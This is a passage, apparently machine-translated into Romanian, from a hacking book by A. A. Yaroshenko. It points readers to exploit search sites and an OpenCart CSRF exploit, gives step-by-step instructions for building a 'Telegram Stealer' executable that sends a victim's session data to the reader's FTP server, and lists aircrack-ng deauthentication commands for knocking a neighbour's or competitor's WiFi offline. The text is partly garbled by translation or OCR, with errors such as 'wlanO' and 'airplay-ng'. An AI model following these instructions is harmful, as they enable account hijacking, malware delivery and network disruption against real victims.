lumea va afla despre asta, inclusiv dezvoltatorii produsului software în care este descoperită vulnerabilitatea Dezvoltatorii Metasploit, după ce vulnerabilitatea devine cunoscută de toată lumea, aceștia trebuie să facă modificări cadrului și să lanseze actualizări Acest lucru este mai complicat decât doar postarea de informații despre vulnerabilitate pe site, așa că implementarea punctului va dura ceva timp Utilizatorul final al Metasploit trebuie să actualizeze cadrul pentru a putea exploata vulnerabilitatea Site-ul https://sploitus com/ este un fel de motor de căutare a vulnerabilităților Acesta prezintă chiar și vulnerabilitățile săptămânii - cele mai noi vulnerabilități pe care le puteți încerca chiar acum Pe fig Figura arată cum arată o vulnerabilitate tipică Mai exact, o vulnerabilitate în popularul motor de comerț electronic OpenCart Puteți accesa magazinul online al cuiva chiar acum! Desigur, aici nu puteți pirata sistemul cuiva introducând un set de comenzi strict definit Aici sunt necesare cunoștințe - înțelegerea elementelor de bază ale unei aplicații web (dacă vorbim despre OpenCart), înțelegerea HTML și PHP Având în vedere vulnerabilitatea specifică prezentată în Fig , atunci totul este simplu - trebuie doar să creați un fișier HTML cu conținutul specificat și să înlocuiți unele dintre valorile formularului cu ale dvs Instrucțiunile sunt, de asemenea, extrem de simple (dacă nu înțelegi, folosește Google Chrome ca traducător de site), dar, din nou, acesta este doar cazul acestei vulnerabilități ' Exploat OpenCart - Falsificarea cererilor pe mai multe site-uri Puc, Descrierea vulnerabilității Deturnarea contului Telegram În această secțiune finală, vom analiza cum să deturnăm contul Telegram de interes Scriptul necesar Telegram Stealer se află în arhiva atașată cărții Cu el, poți prelua contul Telegram al victimei În plus, toate acțiunile vor fi efectuate în Windows: Despachetați arhiva Telegram Stealer zip de pe computer Instalați Python sau o versiune ulterioară Instalați orice editor de cod - fie Sublime Text , fie Visual va fi suficient Studio Code, la un pic, Notepad este suficient Înregistrați-vă pe orice server FTP, ca ultimă soluție, puteți implementa configurați-vă propriul server FTP pe computer, dar acest lucru vă va expune adresa IP, ceea ce nu ar trebui să faceți Deschideți fișierul script în editorul de cod și introduceți datele dvs în el pentru Acces FTP - nume server, nume de utilizator, parolă Toate informațiile din contul Telegram furat vor veni aici Compilați codul de script Python într-un fișier exe Puteți utiliza autopy-to-exe pentru aceasta Trimiteți victimei fișierul exe rezultat Când deschide acest fișier, Pe serverul FTP, două fișiere zip vor apărea în contul dvs Descărcați Telegram Portable și deschideți-l Un dosar va apărea în Telegram "tdata" - deschideți-l Veți avea un folder "D F D D EF C" - deschideți-l și înlocuiți tarO sau tare (trebuie să vă folosiți fișierul de pe serverul tdata zip) Deschideți din nou "tdata" - găsiți fișierul "D F D D EF C", ștergeți-l Transferăm un fișier similar din tdata zip sau tdata zip Lansați Telegram Portable cu Kai - vom avea o sesiune furată pe mâini Cel mai dificil moment din toată această poveste este să forțezi victima să deschidă fișierul exe și să se roage ca antivirusul să nu îl blocheze - totul depinde de antivirus, dacă știe sau nu despre această vulnerabilitate în Telegram Omorârea rețelei WiFi a unui vecin sau a unui concurent Dacă nu ați citit Capitolul sau nu l-ați citit suficient de atent, instrumentele de hacking WiFi pot distruge cu ușurință o rețea WiFi în sine, determinând toți clienții săi să se deconecteze Deci, deschideți un terminal Kali Linux și rulați următoarele comenzi: airmon-ng start wlanO airodump-ng wlanOmon airplay-ng deauth -a BSSID wlanOmon airmon-ng stop wlanOmon Să înțelegem pe scurt ce și de ce (detaliile sunt descrise în capitolul ): • Prima comandă pune interfața de rețea wlanO în modul de monitorizare Dacă aveți mai multe interfețe wireless și doriți să utilizați altceva decât wlanO, atunci trebuie să schimbați numele interfeței Dar, de obicei, toată lumea are o singură interfață wireless, așa că această comandă va rămâne neschimbată • După introducerea primei comenzi, interfața va fi redenumită în wlanOmon Când adaptorul este în modul de monitorizare, introduceți a doua comandă și calculați BSSID-ul rețelei pe care trebuie să o "omorâți" De fapt, aceasta este adresa MAC a routerului Dar dacă încă știți adresa MAC, atunci trebuie să obțineți adresa MAC a inamicului • A treia comandă scoate maximum de utilizatori din rețea Parametrul -a specifică BSSID-ul rețelei - l-ați învățat în pasul anterior Din nou, dacă aveți o interfață diferită, schimbați-i numele • Când ați jucat suficient și vă plictisiți, comutați adaptorul în modul normal cu a patra comandă [ ' Yaroshenko A A HACKING PE EXEMPLE Vulnerabilități, hacking, protecție Echipa de publicare: Cap redactor literatură informatică: M V Finkov Editor: E V Finkov Corector: A V Gromova Science and Technology LLC Licență nr din decembrie , Sankt-Petersburg, pr Obukhovsnoy oborony, Format x / Hârtie de ziar Imprimare offset Volumul p l Tiraj Ordin Imprimat din aspectul original finit Print-M LLC, , MO, Cehov, st Imprimante, d 